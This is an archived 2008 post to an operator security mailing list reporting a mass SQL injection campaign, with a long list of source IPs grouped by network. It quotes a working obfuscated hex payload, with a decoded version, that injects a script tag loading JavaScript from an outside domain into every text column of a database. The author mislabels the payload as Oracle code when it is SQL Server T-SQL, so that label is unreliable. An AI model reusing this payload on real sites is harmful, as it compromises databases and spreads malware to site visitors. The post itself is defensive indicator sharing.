[nsp-sec] Apparent distributed Oracle attack.
Brian Epstein
bepstein at ias.edu
Wed Oct 8 14:31:23 EDT 2008
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
nsp-sec,
Looks like a distributed Oracle SQL injection attack has been
pounding our webservers over the past month. The payload comes
across as:
GET ?;DECLARE%20 at S%20CHAR(4000);SET%20 at S=CAST(0x4445434C41524520405420
7661726368617228323535292C40432076617263686172283430303029204445434C41
5245205461626C655F437572736F7220435552534F5220464F522073656C6563742061
2E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C73797363
6F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970
653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335
206F7220622E78747970653D323331206F7220622E78747970653D31363729204F5045
4E205461626C655F437572736F72204645544348204E4558542046524F4D2020546162
6C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F
5354415455533D302920424547494E20657865632827757064617465205B272B40542B
275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074
207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F77
2E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D207768657265
20272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C73637269
7074207372633D22687474703A2F2F777777332E73733131716E2E636E2F6373727373
2F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E45585420
46524F4D20205461626C655F437572736F7220494E544F2040542C404320454E442043
4C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F
437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 34261 "-"
"Moz illa/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Foxy/1; Foxy/1;
.NET C LR 1.1.4322)"
This translates into (what looks like Oracle specific code to me):
DECLARE @T varchar(255), at C
varchar(4000)
DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects
a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or
b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T, at C
WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+ at T+'] set ['+ at C+']=''"></title><script
src="hxxp://www3 . ss11qn . cn/csrss/w.js"></script><!--''+['+ at C+']
where '+ at C+' not like ''%"></title><script src="hxxp://www3 . ss11qn
. cn/csrss/w . js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO
@T, at C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
Haven't had time to look at the w.js file, yet. Here are the
ip's that have hit us with this attempt.
209 | 67.40.92.175 | ASN-QWEST - Qwest Communications Corporation
209 | 67.40.92.175 | ASN-QWEST - Qwest Communications Corporation
209 | 67.40.92.175 | ASN-QWEST - Qwest Communications Corporation
209 | 67.40.92.175 | ASN-QWEST - Qwest Communications Corporation
209 | 67.40.92.175 | ASN-QWEST - Qwest Communications Corporation
209 | 67.40.92.175 | ASN-QWEST - Qwest Communications Corporation
577 | 64.229.12.10 | BACOM - Bell Canada
577 | 64.229.12.10 | BACOM - Bell Canada
577 | 69.157.17.200 | BACOM - Bell Canada
577 | 70.48.155.232 | BACOM - Bell Canada
577 | 74.14.23.67 | BACOM - Bell Canada
812 | 99.243.242.236 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.253.239.25 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.253.239.25 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.253.239.25 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.253.239.25 | ROGERS-CABLE - Rogers Cable Communications Inc.
812 | 99.253.239.25 | ROGERS-CABLE - Rogers Cable Communications Inc.
852 | 209.115.186.176 | ASN852 - Telus Advanced Communications
852 | 209.115.186.176 | ASN852 - Telus Advanced Communications
1103 | 137.224.237.238 | SURFNET-NL SURFnet, The Netherlands
1103 | 137.224.237.238 | SURFNET-NL SURFnet, The Netherlands
1257 | 83.186.191.23 | TELE2
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
1785 | 64.199.117.42 | AS-PAETEC-NET - PaeTec Communications, Inc.
2856 | 81.129.224.226 | BT-UK-AS BTnet UK Regional network
2856 | 81.149.94.86 | BT-UK-AS BTnet UK Regional network
2856 | 86.134.15.57 | BT-UK-AS BTnet UK Regional network
3215 | 81.80.228.11 | AS3215 France Telecom - Orange
3215 | 81.80.228.11 | AS3215 France Telecom - Orange
3215 | 90.11.97.97 | AS3215 France Telecom - Orange
3215 | 90.11.97.97 | AS3215 France Telecom - Orange
3215 | 90.21.153.93 | AS3215 France Telecom - Orange
3215 | 90.21.153.93 | AS3215 France Telecom - Orange
3215 | 92.134.191.201 | AS3215 France Telecom - Orange
3269 | 79.21.127.239 | ASN-IBSNAZ TELECOM ITALIA
3352 | 83.38.95.74 | TELEFONICA-DATA-ESPANA Internet Access
Network of TDE
3462 | 118.167.136.69 | HINET Data Communication Business Group
3462 | 118.167.136.69 | HINET Data Communication Business Group
3462 | 118.167.136.69 | HINET Data Communication Business Group
3462 | 118.169.17.190 | HINET Data Communication Business Group
3462 | 118.169.17.190 | HINET Data Communication Business Group
3462 | 118.171.154.94 | HINET Data Communication Business Group
3462 | 118.171.154.94 | HINET Data Communication Business Group
3462 | 122.120.218.20 | HINET Data Communication Business Group
3462 | 122.120.218.20 | HINET Data Communication Business Group
3462 | 218.163.41.137 | HINET Data Communication Business Group
3462 | 220.137.76.231 | HINET Data Communication Business Group
3462 | 60.248.174.66 | HINET Data Communication Business Group
3462 | 61.228.125.189 | HINET Data Communication Business Group
3462 | 61.228.159.75 | HINET Data Communication Business Group
4134 | 116.20.230.209 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 116.20.230.209 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 117.88.68.11 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 117.95.98.46 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 117.95.98.46 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 119.125.247.89 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 121.12.55.226 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 121.12.55.226 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 121.12.55.226 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 125.108.151.109 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 125.108.151.109 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 125.74.66.101 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 125.76.61.111 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 125.76.61.111 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 202.103.60.107 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 218.95.97.9 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 219.128.235.16 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 219.137.209.219 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 219.140.160.98 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.166.184.241 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 220.191.226.13 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 221.236.171.203 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 222.212.118.217 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 222.79.161.231 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 222.79.161.231 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 222.85.232.153 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.217.250.65 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 58.45.66.138 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 59.173.189.66 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 59.38.134.222 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 60.168.235.180 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 60.189.125.240 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 60.189.125.240 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 60.190.161.178 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 60.190.161.178 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 60.190.161.178 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.132.139.82 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.136.175.21 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.140.128.197 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.150.82.76 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.150.82.76 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.150.82.76 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.150.82.76 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.150.82.76 | CHINANET-BACKBONE No.31,Jin-rong Street
4134 | 61.178.113.26 | CHINANET-BACKBONE No.31,Jin-rong Street
4589 | 90.200.89.211 | EASYNET Easynet Group Plc
4662 | 61.64.22.120 | QTCN-ASN1 GCNet (Reach & Range Inc.)
4713 | 118.19.73.87 | OCN NTT Communications Corporation
4713 | 222.145.38.157 | OCN NTT Communications Corporation
4713 | 222.145.38.157 | OCN NTT Communications Corporation
4732 | 222.7.163.114 | DION KDDI CORPORATION
4760 | 219.78.189.146 | HKTIMS-AP PCCW Limited
4760 | 219.78.189.146 | HKTIMS-AP PCCW Limited
4760 | 219.78.189.146 | HKTIMS-AP PCCW Limited
4760 | 219.78.189.146 | HKTIMS-AP PCCW Limited
4766 | 121.128.142.174 | KIXS-AS-KR Korea Telecom
4766 | 121.172.53.50 | KIXS-AS-KR Korea Telecom
4766 | 121.172.53.50 | KIXS-AS-KR Korea Telecom
4766 | 121.186.183.159 | KIXS-AS-KR Korea Telecom
4766 | 218.148.180.44 | KIXS-AS-KR Korea Telecom
4766 | 220.91.3.188 | KIXS-AS-KR Korea Telecom
4788 | 58.26.152.162 | TMNET-AS-AP TM Net, Internet Service Provider
4788 | 58.26.152.162 | TMNET-AS-AP TM Net, Internet Service Provider
4788 | 60.50.151.159 | TMNET-AS-AP TM Net, Internet Service Provider
4788 | 60.54.218.150 | TMNET-AS-AP TM Net, Internet Service Provider
4788 | 60.54.218.58 | TMNET-AS-AP TM Net, Internet Service Provider
4808 | 123.117.99.92 | CHINA169-BJ CNCGROUP IP network China169
Beijing Province Network
4808 | 222.131.18.72 | CHINA169-BJ CNCGROUP IP network China169
Beijing Province Network
4837 | 116.3.61.194 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 121.18.194.71 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 121.27.66.201 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 122.156.122.127 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 123.234.245.77 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 123.5.33.83 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 123.5.33.83 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 123.8.133.82 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 124.128.240.210 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 202.99.215.197 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 218.10.248.207 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 218.10.248.207 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 218.11.39.162 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 218.21.209.55 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 218.57.175.189 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 218.67.135.233 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 220.248.144.187 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 221.12.135.195 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 221.206.155.196 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 221.210.60.214 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 222.134.77.68 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 58.18.59.31 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 60.13.11.12 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 60.26.171.46 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 60.7.192.27 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 61.182.253.186 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 61.182.253.186 | CHINA169-BACKBONE CNCGROUP China169 Backbone
4837 | 61.182.253.186 | CHINA169-BACKBONE CNCGROUP China169 Backbone
5089 | 81.105.102.154 | NTL NTL Group Limited
5384 | 195.229.235.37 | EMIRATES-INTERNET Emirates Internet
5390 | 83.117.42.178 | EURONET Orange Nederland B.V. Global AS
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 193.188.105.200 | BATELCO-BH
5416 | 82.194.62.20 | BATELCO-BH
5432 | 80.200.201.76 | BELGACOM-SKYNET-AS Belgacom regional ASN
5432 | 80.200.201.76 | BELGACOM-SKYNET-AS Belgacom regional ASN
5432 | 81.244.101.126 | BELGACOM-SKYNET-AS Belgacom regional ASN
5432 | 81.244.101.126 | BELGACOM-SKYNET-AS Belgacom regional ASN
5432 | 81.244.212.249 | BELGACOM-SKYNET-AS Belgacom regional ASN
5432 | 81.244.212.249 | BELGACOM-SKYNET-AS Belgacom regional ASN
5432 | 81.244.99.100 | BELGACOM-SKYNET-AS Belgacom regional ASN
5650 | 70.101.129.111 | FRONTIER-FRTR - Frontier Communications of
America, Inc.
6079 | 216.164.130.90 | RCN-AS - RCN Corporation
6128 | 24.185.255.100 | CABLE-NET-1 - Cablevision Systems Corp.
6128 | 24.191.226.228 | CABLE-NET-1 - Cablevision Systems Corp.
6197 | 68.158.0.172 | BATI-ATL - BellSouth Network Solutions, Inc
6197 | 68.158.0.172 | BATI-ATL - BellSouth Network Solutions, Inc
6327 | 64.59.144.87 | SHAW - Shaw Communications Inc.
6389 | 65.10.219.72 | BELLSOUTH-NET-BLK - BellSouth.net Inc.
6389 | 65.8.85.74 | BELLSOUTH-NET-BLK - BellSouth.net Inc.
6713 | 196.217.193.82 | IAM-AS
6739 | 212.183.217.63 | ONO-AS Cableuropa - ONO
6830 | 84.119.29.133 | UPC UPC Broadband
6830 | 84.119.29.133 | UPC UPC Broadband
6848 | 78.22.228.253 | TELENET-AS Telenet Operaties N.V.
6848 | 84.192.59.167 | TELENET-AS Telenet Operaties N.V.
7015 | 75.150.120.97 | CCCH-AS2 - Comcast Cable Communications
Holdings, Inc
7016 | 98.219.221.232 | CCCH-AS2 - Comcast Cable Communications
Holdings, Inc
7018 | 12.159.227.130 | ATT-INTERNET4 - AT&T WorldNet Services
7029 | 71.29.233.242 | WINDSTREAM - Windstream Communications Inc
7029 | 71.29.233.242 | WINDSTREAM - Windstream Communications Inc
7029 | 71.29.233.242 | WINDSTREAM - Windstream Communications Inc
7132 | 69.212.52.215 | SBIS-AS - AT&T Internet Services
7132 | 70.242.50.42 | SBIS-AS - AT&T Internet Services
7132 | 71.141.238.40 | SBIS-AS - AT&T Internet Services
7132 | 71.141.238.40 | SBIS-AS - AT&T Internet Services
7132 | 71.141.238.40 | SBIS-AS - AT&T Internet Services
7132 | 71.141.238.40 | SBIS-AS - AT&T Internet Services
7132 | 71.145.161.24 | SBIS-AS - AT&T Internet Services
7132 | 71.145.161.24 | SBIS-AS - AT&T Internet Services
7132 | 75.1.245.82 | SBIS-AS - AT&T Internet Services
7132 | 75.39.188.191 | SBIS-AS - AT&T Internet Services
7132 | 76.205.66.135 | SBIS-AS - AT&T Internet Services
7132 | 76.205.66.135 | SBIS-AS - AT&T Internet Services
7132 | 76.205.66.135 | SBIS-AS - AT&T Internet Services
7132 | 76.254.60.127 | SBIS-AS - AT&T Internet Services
7385 | 67.137.2.3 | INTEGRATELECOM - Integra Telecom, Inc.
7418 | 201.222.156.68 | Terra Networks Chile S.A.
7418 | 201.223.225.224 | Terra Networks Chile S.A.
7418 | 201.223.41.253 | Terra Networks Chile S.A.
7545 | 220.245.180.139 | TPG-INTERNET-AP TPG Internet Pty Ltd
7545 | 220.245.180.139 | TPG-INTERNET-AP TPG Internet Pty Ltd
7643 | 203.162.3.159 | VNN-AS-AP Vietnam Posts and
Telecommunications (VNPT)
7725 | 76.20.216.15 | CCH-AS7 - Comcast Cable Communications
Holdings, Inc
7725 | 76.20.216.15 | CCH-AS7 - Comcast Cable Communications
Holdings, Inc
7843 | 76.177.183.67 | ADELPHIA-AS - Road Runner HoldCo LLC
7843 | 76.177.183.67 | ADELPHIA-AS - Road Runner HoldCo LLC
7843 | 76.177.183.67 | ADELPHIA-AS - Road Runner HoldCo LLC
8151 | 189.186.10.238 | Uninet S.A. de C.V.
8167 | 200.103.105.172 | TELESC - Telecomunicacoes de Santa Catarina SA
8376 | 79.173.239.183 | GO-JOR Autonomous System
8376 | 79.173.239.183 | GO-JOR Autonomous System
9121 | 78.163.61.99 | TTNET TTnet Autonomous System
9121 | 88.250.180.205 | TTNET TTnet Autonomous System
9121 | 88.250.180.205 | TTNET TTnet Autonomous System
9269 | 123.202.215.16 | CTIHK-AS-AP City Telecom (H.K.) Ltd.
9269 | 124.244.218.142 | CTIHK-AS-AP City Telecom (H.K.) Ltd.
9269 | 59.149.23.118 | CTIHK-AS-AP City Telecom (H.K.) Ltd.
9318 | 222.236.18.239 | HANARO-AS Hanaro Telecom Inc.
9394 | 222.63.197.189 | CRNET CHINA RAILWAY Internet(CRNET)
9765 | 58.138.213.156 | VTOPIA-AS-KR VTOPIA
9800 | 211.95.160.253 | UNICOM CHINA UNICOM
9800 | 211.95.160.253 | UNICOM CHINA UNICOM
9829 | 59.96.49.174 | BSNL-NIB National Internet Backbone
9908 | 203.168.214.75 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 218.253.184.102 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 218.253.217.46 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 222.166.160.106 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 222.166.160.115 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 222.166.160.117 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 222.166.160.254 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 61.18.170.202 | HKCABLE2-HK-AP HK Cable TV Ltd
9908 | 61.18.170.203 | HKCABLE2-HK-AP HK Cable TV Ltd
9924 | 124.155.148.93 | TFN-TW Taiwan Fixed Network, Telco and
Network Service Provider.
9924 | 124.8.50.109 | TFN-TW Taiwan Fixed Network, Telco and
Network Service Provider.
9924 | 124.8.50.109 | TFN-TW Taiwan Fixed Network, Telco and
Network Service Provider.
9924 | 61.31.132.159 | TFN-TW Taiwan Fixed Network, Telco and
Network Service Provider.
10036 | 58.140.30.209 | CNM-AS-KR C&M Communication Co. Ltd.
10139 | 203.84.183.194 | SMARTBRO-PH-AP Smart Broadband, Inc.
10155 | 220.230.144.250 | JBCTV-AS-KR CJ CableNet JoongBusan CATV
10197 | 168.131.225.42 | CNU-AS-KR Chonnam National University
10197 | 168.131.225.42 | CNU-AS-KR Chonnam National University
10429 | 200.232.61.26 | Telefonica Empresas SA
10429 | 200.232.61.26 | Telefonica Empresas SA
10796 | 76.190.213.99 | SCRR-10796 - Road Runner HoldCo LLC
10970 | 64.247.207.70 | LIGHTEDGE - LightEdge Solutions
11351 | 76.179.250.242 | RR-NYSREGION-ASN-01 - Road Runner HoldCo LLC
11955 | 67.52.198.194 | SCRR-11955 - Road Runner HoldCo LLC
12271 | 24.103.42.228 | SCRR-12271 - Road Runner HoldCo LLC
12271 | 68.173.158.4 | SCRR-12271 - Road Runner HoldCo LLC
12271 | 69.204.234.179 | SCRR-12271 - Road Runner HoldCo LLC
12271 | 74.68.125.95 | SCRR-12271 - Road Runner HoldCo LLC
12338 | 85.85.210.155 | EUSKALTEL Euskaltel Autonomous System
12392 | 78.129.99.113 | ASBRUTELE AS Object for Brutele SC
12392 | 78.129.99.113 | ASBRUTELE AS Object for Brutele SC
13184 | 78.49.80.20 | HANSENET HanseNet Telekommunikation GmbH
13184 | 78.49.80.20 | HANSENET HanseNet Telekommunikation GmbH
13184 | 78.49.80.20 | HANSENET HanseNet Telekommunikation GmbH
13184 | 78.49.80.20 | HANSENET HanseNet Telekommunikation GmbH
13184 | 78.50.46.167 | HANSENET HanseNet Telekommunikation GmbH
13184 | 78.50.46.167 | HANSENET HanseNet Telekommunikation GmbH
13343 | 68.204.178.34 | SCRR-13343 - Road Runner HoldCo LLC
13343 | 68.204.178.34 | SCRR-13343 - Road Runner HoldCo LLC
13343 | 68.204.178.34 | SCRR-13343 - Road Runner HoldCo LLC
13343 | 97.100.101.251 | SCRR-13343 - Road Runner HoldCo LLC
14117 | 200.126.94.50 | Telefonica del Sur S.A.
14855 | 172.170.18.72 | AOL-MTC1 - America Online, Inc.
14855 | 172.170.18.72 | AOL-MTC1 - America Online, Inc.
15557 | 77.201.189.199 | LDCOMNET NEUF CEGETEL (formerly LDCOM NETWORKS)
15857 | 81.168.162.238 | DIALOG-AS DIALOG-NET Autonomuos System
15857 | 81.168.162.238 | DIALOG-AS DIALOG-NET Autonomuos System
16338 | 80.174.147.102 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.147.102 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.147.102 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.147.102 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
16338 | 80.174.33.150 | AUNA_TELECOM-AS Cableuropa - ONO
17444 | 210.209.117.195 | NWT-AS-AP AS number for New World Telephone
Ltd.
17598 | 61.254.158.198 | YBN-AS-KR YBN
17598 | 61.254.158.198 | YBN-AS-KR YBN
17633 | 122.4.54.225 | CHINATELECOM-SD-AS-AP ASN for Shandong
Provincial Net of CT
17633 | 122.4.54.225 | CHINATELECOM-SD-AS-AP ASN for Shandong
Provincial Net of CT
17633 | 58.57.35.18 | CHINATELECOM-SD-AS-AP ASN for Shandong
Provincial Net of CT
17638 | 58.82.202.156 | CHINATELECOM-TJ-AS-AP ASN for TIANJIN
Provincial Net of CT
17672 | 124.237.87.14 | CHINATELECOM-HE-AS-AP asn for Hebei
Provincial Net of CT
17676 | 220.23.200.125 | GIGAINFRA BB TECHNOLOGY Corp.
17773 | 59.80.224.199 | BEELINK-NET Shandong Sanlian Electronics &
Information Co., Ltd.
17799 | 59.45.194.191 | CHINATELECOM-LN-AS-AP asn for Liaoning
Provincial Net of CT
17799 | 59.45.194.191 | CHINATELECOM-LN-AS-AP asn for Liaoning
Provincial Net of CT
17799 | 59.45.194.191 | CHINATELECOM-LN-AS-AP asn for Liaoning
Provincial Net of CT
17799 | 59.45.194.191 | CHINATELECOM-LN-AS-AP asn for Liaoning
Provincial Net of CT
17799 | 59.45.194.191 | CHINATELECOM-LN-AS-AP asn for Liaoning
Provincial Net of CT
17799 | 59.45.194.191 | CHINATELECOM-LN-AS-AP asn for Liaoning
Provincial Net of CT
17816 | 221.5.63.73 | CHINA169-GZ CNCGROUP IP network China169
Guangzhou MAN
17858 | 124.56.113.89 | KRNIC-ASBLOCK-AP KRNIC
17968 | 61.47.189.95 | DQTNET Daqing zhongji petroleum
telecommunication construction limited cpmpany
18403 | 58.186.124.15 | FPT-AS-AP The Corporation for Financing &
Promoting Technology
18494 | 71.50.23.30 | EMBARQ-WRBG - Embarq Corporation
18494 | 71.50.23.30 | EMBARQ-WRBG - Embarq Corporation
18494 | 71.50.23.30 | EMBARQ-WRBG - Embarq Corporation
19262 | 70.105.89.229 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 71.120.69.137 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 71.120.69.137 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 71.172.35.25 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 71.185.207.224 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 72.89.234.188 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 96.242.180.226 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 96.253.177.250 | VZGNI-TRANSIT - Verizon Internet Services Inc.
19262 | 98.112.82.5 | VZGNI-TRANSIT - Verizon Internet Services Inc.
20001 | 66.74.135.30 | ROADRUNNER-WEST - Road Runner HoldCo LLC
20115 | 24.236.205.196 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 71.10.225.172 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 71.10.225.172 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 71.10.225.172 | CHARTER-NET-HKY-NC - Charter Communications
20115 | 71.87.67.203 | CHARTER-NET-HKY-NC - Charter Communications
20231 | 65.31.98.20 | ROADRUNNER-CENTRAL - Road Runner HoldCo LLC
20231 | 65.31.98.20 | ROADRUNNER-CENTRAL - Road Runner HoldCo LLC
20412 | 67.158.21.30 | PRAIR-2 - PrairieWave Telecommunications, Inc.
20838 | 89.131.18.4 | YIF-AS YIF Autonomous System
20838 | 89.131.18.4 | YIF-AS YIF Autonomous System
21508 | 24.131.3.23 | CCCH-AS5 - Comcast Cable Communications
Holdings, Inc
21508 | 68.57.150.252 | CCCH-AS5 - Comcast Cable Communications
Holdings, Inc
21508 | 71.57.214.151 | CCCH-AS5 - Comcast Cable Communications
Holdings, Inc
21570 | 206.108.132.8 | ACI-1 - Accelerated Connections Inc.
21570 | 206.108.132.8 | ACI-1 - Accelerated Connections Inc.
22047 | 190.44.220.42 | VTR BANDA ANCHA S.A.
22047 | 190.44.220.42 | VTR BANDA ANCHA S.A.
24105 | 220.101.137.132 | UNWIRED-CORE-AP Unwired Group, Fixed
Wireless Broadband Access, Sydney
24105 | 220.101.137.132 | UNWIRED-CORE-AP Unwired Group, Fixed
Wireless Broadband Access, Sydney
24326 | 117.47.72.115 | TTT-AS-AP Maxnet, Internet Service
Provider, Bangkok
26473 | 201.216.76.167 | CURANET N.V.
26473 | 201.216.76.172 | CURANET N.V.
26473 | 201.216.76.172 | CURANET N.V.
26473 | 201.216.76.172 | CURANET N.V.
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
29737 | 69.14.195.91 | WOW-INTERNET - WideOpenWest Finance LLC
30998 | 196.220.19.134 | NAL-AS
33139 | 67.204.51.68 | CANACA-210 - Canaca-com Inc.
